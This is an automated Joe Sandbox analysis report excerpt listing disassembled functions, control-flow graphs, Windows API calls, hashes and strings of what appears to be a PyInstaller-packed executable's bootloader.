                                                                                                                                                                                                      control_flow_graph 536 7ff7ff5a69d4-7ff7ff5a6a47 call 7ff7ff5a6708 539 7ff7ff5a6a61-7ff7ff5a6a6b call 7ff7ff598590 536->539 540 7ff7ff5a6a49-7ff7ff5a6a52 call 7ff7ff594f58 536->540 545 7ff7ff5a6a86-7ff7ff5a6aef CreateFileW 539->545 546 7ff7ff5a6a6d-7ff7ff5a6a84 call 7ff7ff594f58 call 7ff7ff594f78 539->546 547 7ff7ff5a6a55-7ff7ff5a6a5c call 7ff7ff594f78 540->547 549 7ff7ff5a6af1-7ff7ff5a6af7 545->549 550 7ff7ff5a6b6c-7ff7ff5a6b77 GetFileType 545->550 546->547 563 7ff7ff5a6da2-7ff7ff5a6dc2 547->563 553 7ff7ff5a6b39-7ff7ff5a6b67 GetLastError call 7ff7ff594eec 549->553 554 7ff7ff5a6af9-7ff7ff5a6afd 549->554 556 7ff7ff5a6bca-7ff7ff5a6bd1 550->556 557 7ff7ff5a6b79-7ff7ff5a6bb4 GetLastError call 7ff7ff594eec CloseHandle 550->557 553->547 554->553 561 7ff7ff5a6aff-7ff7ff5a6b37 CreateFileW 554->561 559 7ff7ff5a6bd3-7ff7ff5a6bd7 556->559 560 7ff7ff5a6bd9-7ff7ff5a6bdc 556->560 557->547 570 7ff7ff5a6bba-7ff7ff5a6bc5 call 7ff7ff594f78 557->570 566 7ff7ff5a6be2-7ff7ff5a6c37 call 7ff7ff5984a8 559->566 560->566 567 7ff7ff5a6bde 560->567 561->550 561->553 575 7ff7ff5a6c56-7ff7ff5a6c87 call 7ff7ff5a6488 566->575 576 7ff7ff5a6c39-7ff7ff5a6c45 call 7ff7ff5a6910 566->576 567->566 570->547 581 7ff7ff5a6c89-7ff7ff5a6c8b 575->581 582 7ff7ff5a6c8d-7ff7ff5a6ccf 575->582 576->575 583 7ff7ff5a6c47 576->583 584 7ff7ff5a6c49-7ff7ff5a6c51 call 7ff7ff59ab30 581->584 585 7ff7ff5a6cf1-7ff7ff5a6cfc 582->585 586 7ff7ff5a6cd1-7ff7ff5a6cd5 582->586 583->584 584->563 588 7ff7ff5a6da0 585->588 589 7ff7ff5a6d02-7ff7ff5a6d06 585->589 586->585 587 7ff7ff5a6cd7-7ff7ff5a6cec 586->587 587->585 588->563 589->588 592 7ff7ff5a6d0c-7ff7ff5a6d51 CloseHandle CreateFileW 589->592 593 7ff7ff5a6d53-7ff7ff5a6d81 GetLastError call 7ff7ff594eec call 7ff7ff5986d0 592->593 594 7ff7ff5a6d86-7ff7ff5a6d9b 592->594 593->594 594->588
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: c94df809199b81bb341f8ac31c980e2f54dd82e759c8744b17fa9702197ee3d6
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: DBC1DE36B29A8285EB10EF65C4902AC7761FB48B98F814335DA3E5B7D4DF38D421C3A0

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58841B
• RemoveDirectoryW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58849E
• DeleteFileW.KERNELBASE(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884BD
• FindNextFileW.KERNELBASE(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884CB
• FindClose.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884DC
• RemoveDirectoryW.KERNELBASE(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                      • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                      • Instruction ID: 1f4735558c2cc05e2b2cae2f858f605ce02fb16e1e08164ffce82021d2475a73
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6416222A0DAC295EB20BB24E4445F9A360FB94759FC00332D57D476E4DF3CD54AC7A4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                      • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                      • Instruction ID: 80f56aa61dc15b83b9b1069b43413b770e257c14297a8feb480ef5b14cc13ec1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF06822A197C186FB609F64B4497A6B750FB84769F840335DA7D036D4DF3CD059CA50

Control-flow Graph (interactive graph data not reproduced)
APIs
  • Part of subcall function 00007FF7FF587F80: _fread_nolock.LIBCMT ref: 00007FF7FF58802A
• _fread_nolock.LIBCMT ref: 00007FF7FF581A1B
  • Part of subcall function 00007FF7FF582910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FF581B6A), ref: 00007FF7FF58295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: fb8dace35f984c3c8d59b22f0dfd890ef8918d876ac5e0f6e5e6b76f1e80faa4
• Instruction ID: e8ff027ac9776c38a0ce57b0106014e78f9e1177fbabef214dfc03ec36f5e0e7
• Opcode Fuzzy Hash: fb8dace35f984c3c8d59b22f0dfd890ef8918d876ac5e0f6e5e6b76f1e80faa4
• Instruction Fuzzy Hash: 39818D71A096C696EB20AB24D0402F9A3A1FF48784F944631E9BD477D6EE3CE585C7E0

Control-flow Graph (interactive graph data not reproduced)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 23ac436432f69dff89e67b7c3031c819f54d06e4f97595c0cc87ed9803ad40dc
• Instruction ID: 42583fd67a5256244861b10729d7d39e3ba4584d00640a868a6a934d15417087
• Opcode Fuzzy Hash: 23ac436432f69dff89e67b7c3031c819f54d06e4f97595c0cc87ed9803ad40dc
• Instruction Fuzzy Hash: 1D519A21A096C392EB14BB2294401EAA3A0BF41B94FC44735EE7D47BE6DE3CE555C7E0

Control-flow Graph (interactive graph data not reproduced)

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF7FF583CBB), ref: 00007FF7FF5888F4
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF7FF583CBB), ref: 00007FF7FF5888FA
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF7FF583CBB), ref: 00007FF7FF58893C
  • Part of subcall function 00007FF7FF588A20: GetEnvironmentVariableW.KERNEL32(00007FF7FF58388E), ref: 00007FF7FF588A57
  • Part of subcall function 00007FF7FF588A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7FF588A79
  • Part of subcall function 00007FF7FF5982A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5982C1
  • Part of subcall function 00007FF7FF582810: MessageBoxW.USER32 ref: 00007FF7FF5828EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction ID: 86979438d1f6213863f5b2f138208d8bac97bee4d79f3f3289ff0c5bc3daa82e
• Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction Fuzzy Hash: 1A419D12A096C340EB24BB25A8552F99291FF89B85FC04331ED3D4B7D6EE3CE501C6E0

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 599 7ff7ff581210-7ff7ff58126d call 7ff7ff58bdf0 602 7ff7ff581297-7ff7ff5812af call 7ff7ff594fb4 599->602 603 7ff7ff58126f-7ff7ff581296 call 7ff7ff582710 599->603 608 7ff7ff5812d4-7ff7ff5812e4 call 7ff7ff594fb4 602->608 609 7ff7ff5812b1-7ff7ff5812cf call 7ff7ff594f78 call 7ff7ff582910 602->609 615 7ff7ff581309-7ff7ff58131b 608->615 616 7ff7ff5812e6-7ff7ff581304 call 7ff7ff594f78 call 7ff7ff582910 608->616 622 7ff7ff581439-7ff7ff58144e call 7ff7ff58bad0 call 7ff7ff594fa0 * 2 609->622 618 7ff7ff581320-7ff7ff581345 call 7ff7ff59040c 615->618 616->622 628 7ff7ff58134b-7ff7ff581355 call 7ff7ff590180 618->628 629 7ff7ff581431 618->629 636 7ff7ff581453-7ff7ff58146d 622->636 628->629 635 7ff7ff58135b-7ff7ff581367 628->635 629->622 637 7ff7ff581370-7ff7ff581398 call 7ff7ff58a230 635->637 640 7ff7ff58139a-7ff7ff58139d 637->640 641 7ff7ff581416-7ff7ff58142c call 7ff7ff582710 637->641 642 7ff7ff581411 640->642 643 7ff7ff58139f-7ff7ff5813a9 640->643 641->629 642->641 645 7ff7ff5813ab-7ff7ff5813b9 call 7ff7ff590b4c 643->645 646 7ff7ff5813d4-7ff7ff5813d7 643->646 650 7ff7ff5813be-7ff7ff5813c1 645->650 648 7ff7ff5813ea-7ff7ff5813ef 646->648 649 7ff7ff5813d9-7ff7ff5813e7 call 7ff7ff5a9ea0 646->649 648->637 652 7ff7ff5813f5-7ff7ff5813f8 648->652 649->648 653 7ff7ff5813c3-7ff7ff5813cd call 7ff7ff590180 650->653 654 7ff7ff5813cf-7ff7ff5813d2 650->654 656 7ff7ff58140c-7ff7ff58140f 652->656 657 7ff7ff5813fa-7ff7ff5813fd 652->657 653->648 653->654 654->641 656->629 657->641 659 7ff7ff5813ff-7ff7ff581407 657->659 659->618
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                                                                                                                      • Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                      • Instruction ID: fc1cdf96532a676fd4d30c97842cd2cce772d914208fd1d27e531a96dd1b30c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB51C422A09AC241EB60BB11A4403FAE291BF85794FC44331ED7E47BE5EE3CE545C7A0

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF7FF59F11A,?,?,-00000018,00007FF7FF59ADC3,?,?,?,00007FF7FF59ACBA,?,?,?,00007FF7FF595FAE), ref: 00007FF7FF59EEFC
• GetProcAddress.KERNEL32(?,?,?,00007FF7FF59F11A,?,?,-00000018,00007FF7FF59ADC3,?,?,?,00007FF7FF59ACBA,?,?,?,00007FF7FF595FAE), ref: 00007FF7FF59EF08
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction ID: 94eb0019f1b89339c6a4af6289785c40a53f72699f06dfac20263d869b6f258d
• Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction Fuzzy Hash: E641D221B196A282EB2AEB1698445F5A791BF48B90FC84739DD3D573D4EE3CE40582B0

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7FF583804), ref: 00007FF7FF5836E1
• GetLastError.KERNEL32(?,00007FF7FF583804), ref: 00007FF7FF5836EB
  • Part of subcall function 00007FF7FF582C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582C9E
  • Part of subcall function 00007FF7FF582C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582D63
  • Part of subcall function 00007FF7FF582C50: MessageBoxW.USER32 ref: 00007FF7FF582D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: f5f5644522468bfb6c97155f5e32020bca623684ed21aa1b6ac219ac407b73c0
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: A4218391B19AC251FB20BB24E8043F6A290BF48755FC40332D57EC35E5EE2CE604C7A0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
• Instruction ID: 83fa90cfd8c71e74b13d55bcc48a617426c8c0bf2705065cbd80c80d8286db5e
• Opcode Fuzzy Hash: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
• Instruction Fuzzy Hash: F5C1B2229087CBA1F778AB1594402FDA764EB81B80F954331EA7E037E1CE7CE95583A0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
                                                                                                                                                                                                      • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                      • Instruction ID: 31d7f8be36e7431e17f9a85cd543db170859c106f42b0e6d533bb689fe0fbb5b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62217E21A0C68342EB10AB55F4942AAE7A0FB857A0F900735EABD47AE4DF6CD455CB90

Control-flow Graph (image not reproduced)

APIs
  • Part of subcall function 00007FF7FF588760: GetCurrentProcess.KERNEL32 ref: 00007FF7FF588780
  • Part of subcall function 00007FF7FF588760: OpenProcessToken.ADVAPI32 ref: 00007FF7FF588793
  • Part of subcall function 00007FF7FF588760: GetTokenInformation.KERNELBASE ref: 00007FF7FF5887B8
  • Part of subcall function 00007FF7FF588760: GetLastError.KERNEL32 ref: 00007FF7FF5887C2
  • Part of subcall function 00007FF7FF588760: GetTokenInformation.KERNELBASE ref: 00007FF7FF588802
  • Part of subcall function 00007FF7FF588760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7FF58881E
  • Part of subcall function 00007FF7FF588760: CloseHandle.KERNEL32 ref: 00007FF7FF588836
• LocalFree.KERNEL32(?,00007FF7FF583C55), ref: 00007FF7FF58916C
• LocalFree.KERNEL32(?,00007FF7FF583C55), ref: 00007FF7FF589175
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
• Instruction ID: 41f2051c5beebed55413ace6f294a047302673919fb108bd8f297b157899db18
• Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
• Instruction Fuzzy Hash: 92213C21A096C282F710BB10E5152EAA6A0FF88780FC44235EA7D53BD6EF3CD805C7E0

Control-flow Graph (rendered graph not reproduced; function at 7ff7ff59cfd0, block and edge listing omitted)
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FF59CFBB), ref: 00007FF7FF59D0EC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FF59CFBB), ref: 00007FF7FF59D177
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction ID: cef920b1496819e1980775ef83826ecafb258c76f2f942745081a0b4e0fbf0dd
• Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction Fuzzy Hash: 2591E732F1869285F774AF6594402FDABA0BB40788F944235DE7E536D4EE3CD442C7A0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
